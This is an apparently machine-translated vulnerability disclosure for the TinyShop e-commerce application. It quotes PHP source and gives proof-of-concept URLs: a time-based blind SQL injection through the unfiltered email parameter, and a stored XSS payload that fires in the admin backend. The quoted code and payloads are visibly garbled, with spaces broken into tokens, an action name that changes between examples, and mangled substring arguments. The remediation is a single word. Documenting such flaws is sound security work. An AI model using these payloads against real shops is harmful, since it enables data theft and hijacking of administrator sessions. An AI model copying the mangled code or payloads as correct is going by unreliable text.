TinyShop blind injection and storage xss at the same place

TinyShop blind injection and storage xss at the same place

Parameters are not filtered, resulting in SQL injection and backend storage xss at the same location.

Let's take a look at how tinyshop handles the passed parameters:

/Framework/lib/util/request_class.php

Public static function get () {$ num = func_num_args (); $ args = func_get_args (); if ($ num = 1) {if (isset ($ _ GET [$ args [0]) {if (is_array ($ _ GET [$ args [0]) return $ _ GET [$ args [0]; else return trim ($ _ GET [$ args [0]);} return null ;} else if ($ num> = 2) {if ($ args [1]! = Null) $ _ GET [$ args [0] = $ args [1]; else if (isset ($ _ GET [$ args [0]) unset ($ _ GET [$ args [0]);} else {return $ _ GET ;}// corresponding processing $ _ POST public static function post () {$ num = func_num_args (); $ args = func_get_args (); if ($ num = 1) {if (isset ($ _ POST [$ args [0]) {if (is_array ($ _ POST [$ args [0]) return $ _ POST [$ args [0]; else return trim ($ _ POST [$ args [0]);} return null;} else if ($ num >=2) {if ($ args [1]! = Null) $ _ POST [$ args [0] = $ args [1]; else if (isset ($ _ POST [$ args [0]) unset ($ _ POST [$ args [0]);} else {return $ _ POST ;}// simultaneously process $ _ GET $ _ POST public static function args () {$ num = func_num_args (); $ args = func_get_args (); if ($ num = 1) {if (isset ($ _ POST [$ args [0]) {if (is_array ($ _ POST [$ args [0]) return $ _ POST [$ args [0]; else return trim ($ _ POST [$ args [0]);} else {if (isset ($ _ GET [$ args [0]) {if (is_arr Ay ($ _ GET [$ args [0]) return $ _ GET [$ args [0]; else return trim ($ _ GET [$ args [0]) ;}} return null;} else if ($ num >=2) {if ($ args [1]! = Null) {$ _ POST [$ args [0] = $ args [1]; $ _ GET [$ args [0] = $ args [1];} else {if (isset ($ _ GET [$ args [0]) unset ($ _ GET [$ args [0]); if (isset ($ _ POST [$ args [0]) unset ($ _ POST [$ args [0]);} else {return $ _ POST + $ _ GET ;}}

It can be seen from the above that only the POST and GET methods are encapsulated into the Req class, and no filtering is performed.

Vulnerabilities occur in/protected/controllers/index. php.

Public function Y () {$ goods_id = Filter: int (Req: args ('goods _ id'); $ email = Req: args ('email '); // $ mobile = Req: args ('mobile'); // the email and mobile are not filtered out. $ model = new Model ('mobily '); $ register_time = Date ('Y-m-d H: I: s'); $ info = array ('status' => 'fail ', 'msg '=>' You have not logged on and cannot subscribe to the Arrival notification. '); If (isset ($ this-> user ['id']) {$ time = date ('Y-m-d H: I: s ', strtotime ('-3 Day'); $ obj = $ model-> where ('user _ id = '. $ this-> user ['id']. and goods_id = '. $ goods_id. 'and register_time> '. "'$ time'")-> find (); if ($ obj) {$ info = array ('status' => 'warning ', 'msg '=>' You have subscribed to the goods arrival notification. ');} Else {$ data = array ('user _ id' => $ this-> user ['id'], 'goods _ id' => $ goods_id, 'register _ time' => $ register_time, 'email '=> $ email, 'mobile' => $ mobile); $ last_id = $ model-> data ($ data) -> insert (); // insert unfiltered data into the database if ($ last_id> 0) $ info = array ('status' => 'success ', 'msg '=>' subscription successful. '); Else $ info = array ('status' => 'fail', 'msg '=>' subscription failed. ') ;}} Echo JSON: encode ($ info );}

 

Injection:

Because there is no echo and no error can be reported, you have to use time-based blind note:

Http: // localhost/index. php? Con = index & act = Y & goods_id = 1 & email = 100', (if (substring (user (), 111) = char (114), sleep (5 ), 798) % 23 & mobile = 1

If the first user is r, the latency is 5 seconds.
 

Xss:

Http: // localhost/index. php? Con = index & act = Policy & goods_id = 2 & email = <script> alert (\ 'zxx \ '); </script> & mobile = 111
 

The administrator can view the Arrival notification in the background:

 

Solution:

Filter